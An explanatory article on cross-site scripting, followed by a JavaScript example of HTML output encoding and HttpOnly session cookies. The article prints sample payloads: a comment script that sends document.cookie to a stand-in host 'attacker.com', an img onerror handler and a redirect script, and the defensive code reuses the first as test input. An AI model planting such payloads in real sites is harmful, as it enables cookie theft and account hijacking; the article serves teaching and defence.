XSS stands for Cross-Site Scripting; it is abbreviated XSS rather than CSS to distinguish it from Cascading Style Sheets. The core of an XSS attack is getting malicious JavaScript to execute inside the target page, in the victim's browser.

Take a common example: website A has a user comment feature. Assuming website A takes no measures to prevent XSS, an attacker can submit the following content as a comment:

```html
<script>
  const cookie = document.cookie;
  // Ajax sends the cookie to the attacker's own server (pseudocode)
  Ajax('http://attacker.com', cookie);
</script>
```

Website A saves the content to the server and displays it on the page. When user A later visits the comment page, user A's browser recognizes the script tag and executes the code inside it. It happens that the login credentials for website A are all kept in cookies, so the attacker can now log in to website A as user A.

XSS attack modes

In addition to the script tag shown above, any element or attribute the browser treats as executable can carry the payload, such as:

```html
<img src="x" onerror="alert('hey!')">
<a onmousemove="do something here">
```

XSS attack intentions

  • Steal cookie values from the target web page

    The server can mark a cookie HttpOnly so that page scripts cannot read it (browser support is required, since the cookie is ultimately owned by the browser).

  • Hijack traffic by redirecting visitors to another site

    Insert code like the following:

```html
<script>window.location.href="http://www.baidu.com";</script>
```

This effectively steals traffic from the target site.

Precautions

  • Filter tags such as <script>, <img>, and <a>
  • Escape and encode content uploaded by users, so that the browser does not interpret it as markup, without affecting how it is displayed.
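The two defences above, as an added example that is not part of the original article: a small output-encoding routine applied to comment text before it is placed in HTML, and a Set-Cookie header that marks the session cookie HttpOnly so that document.cookie cannot read it even if a script does run. Encoding at output is preferred over filtering tag names, because a denylist of tags must anticipate every element and event handler the browser accepts, while encoding the five significant characters makes the browser treat the whole value as text. The sample comments, the helper names (escapeHtml, renderComment, isHtmlSafeText, sessionCookieHeader) and the cookie attributes chosen are assumptions for this example.

```javascript
// Added example, not code from the original article.
// Output-encode untrusted comment text and issue an HttpOnly session cookie.

// The characters that change meaning inside HTML text and attribute values.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode a string so the browser displays it as text instead of parsing it as markup.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one comment. The untrusted author and body are encoded; the surrounding
// markup is fixed by the application, so only it can introduce elements.
function renderComment(author, body) {
  return `<li class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</li>`;
}

// Self-check for encoded text: no raw markup characters remain, and every '&'
// starts one of the entities escapeHtml emits.
function isHtmlSafeText(text) {
  return !/[<>"']/.test(text) && !/&(?!(amp|lt|gt|quot|#39);)/.test(text);
}

// Set-Cookie value for the session (assumed attributes). HttpOnly keeps it out of
// document.cookie; Secure restricts it to HTTPS; SameSite=Lax limits cross-site sends.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample input: an ordinary comment and the payloads from the article.
const SAMPLE_COMMENTS = [
  { author: 'alice', body: 'Nice post!' },
  { author: 'mallory', body: '<script>Ajax("http://attacker.com", document.cookie)</script>' },
  { author: 'mallory', body: '<img src="x" onerror="alert(\'hey!\')">' },
];

// Render each sample and report whether the encoded body still contains raw markup.
for (const c of SAMPLE_COMMENTS) {
  const html = renderComment(c.author, c.body);
  console.log(html, '| body safe:', isHtmlSafeText(escapeHtml(c.body)));
}
console.log('Set-Cookie:', sessionCookieHeader('sid', 'constructed-session-id'));
```

The escaped comment still shows the attacker's text verbatim on the page, which is what the second precaution asks for; what changes is that the browser never sees a `<` that could open a tag. Escaping is context-specific: this routine is for HTML text and quoted attribute values, and content placed inside a script block, a URL, or CSS needs the encoding for that context instead.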